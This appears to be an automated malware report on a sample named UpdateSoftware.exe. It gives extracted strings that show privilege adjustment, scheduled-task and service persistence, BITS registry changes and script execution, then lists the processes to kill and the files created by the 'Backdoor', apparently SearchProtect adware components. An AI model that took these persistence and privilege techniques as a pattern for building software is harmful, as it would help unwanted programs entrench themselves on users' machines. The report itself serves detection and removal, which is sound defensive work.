The file %s or one of its components cannot run in standard or enhanced mode Windows.
Another instance of the file %s is already running.
An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
UpdateSoftware.exe_3512:
.text
`.rdata
@.data
.rsrc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
load x
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
F%D,3
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GetCPInfo
20120606
c:\documents and settings\all users\application data\softsafe\updatesoftware\UpdateSoftware.exe
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
portuguese-brazilian
USER32.DLL
5476476
4740740
10001000
2303303
6874874
7144144
5%s\%s
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
_dlsys->%s is null
ProductSupport
log.txt
AG%d%s
access out of bounds index %d not in 0..%d
UInfoURL
E:%u LookupPrivValue
E:%u AdjustTokenPriv
AdjustTokenPriv() return: %u (0==success)
E:%u OpProcTkn
(lpCmdLine==NULL)
result=%s
E: empty key; ignored
Except 0x%0.8x @0x%0.8x (%.30s) hmod=0xx
E:%d enc
8808808
6174174
4364364
8129129
5673673
6281281
5175175
7869869
PendingFileRenameOperations
PendingFileRenameOperations2
FileRenameOperations
c:\temp\winnie-pooh\piglet-rules.tmp
DeleteFile('%s') OK (not exist)
DeleteFile('%s') E1:%d;E2:%d
DeleteFile('%s') OK (scheduled; immediate E:%d); pending ops found:%d
DeleteFile('%s') OK
'%.256s~': E:%d
C:\Users
C:\Doc
\qmgr.dll
major version %d looks bogus
minor ver %d looks bogus
s-pack %d looks bogus
E:%d creating Runtime; OS-ver=%d
DLL LogPath='%s'
DL%d_%s
E:%d create HTML document; OS-ver=%d, IE-ver=%s
E:%d bind runtime to HTML window; OS-ver=%d, IE-ver=%s
E:%d LoadScr(BOOT)
E:%d LoadScr(JSO)
FROMAGENT_URLMON_IS_PRIMARY
FROMAGENT_NO_FALLBACK_ON_HTTP_ERRORS
E:%x execScript(JSON)
E:%x execScript(BOOTSTRAP)
execScript(BOOTSTRAP) done; m_eExitCode not set, assumed %d (E_SUCCESS=%d)
execScript(BOOTSTRAP) done; EC:{%d,%d}
execScript(BOOTSTRAP): script ended: VT_%d (VT_INT=%d)
worker about to end - calling spRuntime.Release();
%s-%s
Global\%s
E:%d CreateEvent '%s'
/schedule /profile "%s"
E:%d installing task '%.256s~'
E:%d removing task '%.256s~'
SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
E:%d open BITS registry at '%s'
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): BITS FGND retries (in registry) = %d
Refresh enth set to %d sec
%ds[to-wait]-%ds[since-last];keep>0 ==>%ds
Waiting %ds
"%s" /%s "%s"
E appdaemon.Start '%.256s~'
%d.%d.%d.d
: E:%d open agent key '%.50s>'
E:%d delete module key '%.256s~'
: InitializeSecurityDescriptor failed; Error %u
: SetSecurityDescriptorDacl failed; Error %u
%s\%s\%s
%s\%s
E:%d open agent key'%.256s~'
WriteRegistryProfile E open module key '%.50s>' E:%d
WriteRegistryProfile E create section key '%.50s>' E:%d
WriteRegistryProfile E write section='%.50s>' value='%.50s>'; E:%d
['%.50s>']('%.50s>')<=='%.50s>'; E:%d; %s: {sec'%.50s>',key'%.50s>'} E val-len %d>%d truncated
['%.256s~']('%.256s~')='%.256s~'; E %d too long, max=%d
E:%d start worker watchdog
CAgentModule::WatchdogThreadMain: Watchdog active. no event; waiting %d sec
.ini.bak
(%s,%s): E:%d open key
E:%d CoCreateInst
E:%d: ITaskSched::NewWItem
SetApplicationName E:%d
E:%d SetParameters
SetWorkingDirectory E:%d
SetAccountInformation E:%d
SetComment E:%d
SetFlags E:%d
CreateTrigger E:%d
SetTrigger E:%d
SetMaxRunTime E:%d
QueryInterface(IPersistFile) E:%d
E:%d save task in scheduler (IPersistFile::Save)
E:%d activate task (ITask::Run)
CoCreateInstance TaskScheduler failed %d
ITaskScheduler::Delete failed %d
E:%d OpSCMan
OpenService failed %d
ChangeServiceConfig failed %d
E:%d GetUserName
: E:%d LoadUserProfile (hTok=0x%x)
E:%d CreateEnvironmentBlock (hTok=0x%x)
"%s" %s
E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess
E:0xx CreateProcess; cannot start worker
E:0x%x CreateProcess OK but (hProcess==NULL); cannot start worker
: PHY %dmb<%dmb; E start command'%.256s~'
: VIRT %dmb<%dmb; E start command'%.256s~'
E:0x%0x WTSQUserTken
: E:0x%0x DupToken(Impers); continue;
: E:0x%0x DupToken(Ident); continue;
: E:0x%0x GetTokenInfo; continue;
E:0x%0x ImpersLOU
non admin user, os-ver=%d ==> do not execute
E:%d FndNxtFile: source is a folder
DeleteDirectory('%s') OK
DeleteDirectory('%s') E:%d
RemoveFileTree('%s') OK
RemoveFileTree('%s') E:%d
E:%d '%.256s~'->'%.256s~'
E:%d encrypting; cont unencrypted
E:%d Prepare()
ShellExecuteEx
E:%d (info.hInstance=%d)
Notepad.exe
Software\Microsoft\Windows\Current
ddeexec
.aHTML
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ddd
%d.%d.0.%d
URLInfoAbout
URLUpdateInfo
C:\Windows\System32\msiexec.exe
PID%d.TID%d
CEventLogger::LogEventV: vsprintf error %d with pszFormat='%s'
E:%d create memlog
{"entry_counter":"%u","entry_time":"%s","entry_type":"%llu","message":"%.256s"},file not reported
JScr E:'%.50s>' F:'%.30s>',L:%d
E:NULL desc) (F='%.30s>',L=%d)
JScr: ExitP(%d)
JScr: ExitP(no code=%d)
E:%d data='%.256s~'
E:%d GetDisID'%.256s~'
ver=%d.%d.%d(%s)
os_id=%d.%d.%d sp%d
aid=%s
hid=%s (old crc32=0xx)
timestamp now=0x%s
IPv4_long=%d 0xx
E:%d folder '%s'
killed %d '%.256s~'
E:%d copy to '%.256s~'
E:%d ShellExec '%.256s~''%.256s~'
E:%d CreateProc '%.256s~'
E:%d GetExitCodProc(pid=%d)
E:%d inst to '%.256s~'
/instal E not adm. (OSVer=%d)
/install E not admin. (OSVer=%d) Cannot run
/Install E:%d; continue as worker to report
/inst E not admin. (OSVer=%d)
/install E:%d schedule logon task (OSVer=%d); continue as worker to report
/install OK, but uninstaller(this=0x%x) E:%d.
/install OK. (will be reported by self)
/install E:%d. (is reported by parent)
/schedule E not admin. (OSVer=%d) Cannot run
New Scheduler v%d.%d.%d %s
Scheduler exits C:0x%x
/uninstall requires admin privileges. (OSVer=%d) Cannot run
Disable OK; %d killed
UNINST REPORT STARTS
UNINST REPORT ENDS
New Wker v%d.%d.%d %s
Worker exits C:0x%x
E:0x%x create: '%.256s~'
7382382
(%s,%s): OK
(%s,%s): E:%d setting value
E:%d open key '%.256s~'
RegDeleteKeyEx
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nshBF.exe:2008
putfu.exe:2928
sp-downloader.exe:1716
CltMngSvc.exe:1784
CltMngSvc.exe:1640
nsoBA.tmp:2012
cltmng.exe:996
usetup.exe:3420
cltmngui.exe:1296
rundll32.exe:3116
rundll32.exe:3052
%original file name%.exe:312
nsuB5.exe:516
nsuC3.exe:2608
UpdateSoftware.exe:3512
UpdateSoftware.exe:3456
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\inetc.dll (30 bytes)
%Program Files%\ProgramUpdater\Assistant.dll (264574 bytes)
%Program Files%\ProgramUpdater\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB5.exe (11736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\MiniStubUtils.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\downloadstub[1] (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB3.tmp (7189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spstub[1].exe (11736 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (9 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_checked.png (360 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgUninstall.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\v.png (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64.dll (103387 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32.dll (287458 bytes)
%Program Files%\SearchProtect\EULA.txt (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-onclick.png (2 bytes)
%Program Files%\SearchProtect\Main\bin\uninstall.exe (33747 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuC3.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.css (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-selected.png (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\x.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button2.png (886 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnSilver.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\main.js (10 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox.png (378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnClose.png (933 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\json2.min.js (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettings.png (12 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPTool64.exe (50351 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\defaults.js (983 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez.png (256 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-over-click.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button.png (859 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\bin\cltmngui.exe (100378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\gray-bg.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\style.css (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettingsDS.png (9 bytes)
%Program Files%\SearchProtect\Main\bin\CltMngSvc.exe (96792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\SPtool.dll (81046 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\cltmng.exe (170836 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-uninstall.png (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\info-icon.png (424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\browsers32.sdb (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\inetc.dll (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.js (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\SPDialogAPI.js (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings.html (8 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgNotif.png (9 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.html (12 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.html (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Settings-icon.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-with-logo.png (1552 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-selected.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-Rollover.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-rollover.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\text-field.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshBF.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.css (4 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_def.png (274 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\icon-win.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\dialogUtils.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnBlue.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\button-bg.png (1 bytes)
%Program Files%\SearchProtect\Main\bin\SPTool.dll (81046 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserRepository.dat (478 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\jquery.1.7.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C2.tmp (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\defaults.js (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (6584 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-default.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszBE.tmp (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\System.dll (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-selected.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CT3309297[1] (649 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.js (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\defaults.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqBC.tmp (698645 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserSettings.dat (1 bytes)
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\UpdateSoftware.exe (33792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\UI\rep\UIRepository.dat (1057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\general_logo.bmp.tmp (808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\general_logo[1].bmp (784 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin57DE.bat (84 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.dat (14184 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3EFFE146.dat (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\2[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_2.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sp-downloader[1].exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\50b2a4e2b05f1a96cb606980e48cc21e.log (3036232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_2[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin3D45.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tsu905D28F2.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7306_appcompat.txt (214 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.2.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.sp-downloader.exe (5064 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.usetup.exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SPSetup[1].exe (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB8.tmp (10114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.tmp (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\StubUtils.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.txt (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\inetc.dll (30 bytes)
%WinDir%\Tasks\UpdateSoftware-S-3956077583.job (692 bytes)
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\3956077583.ini (42494 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.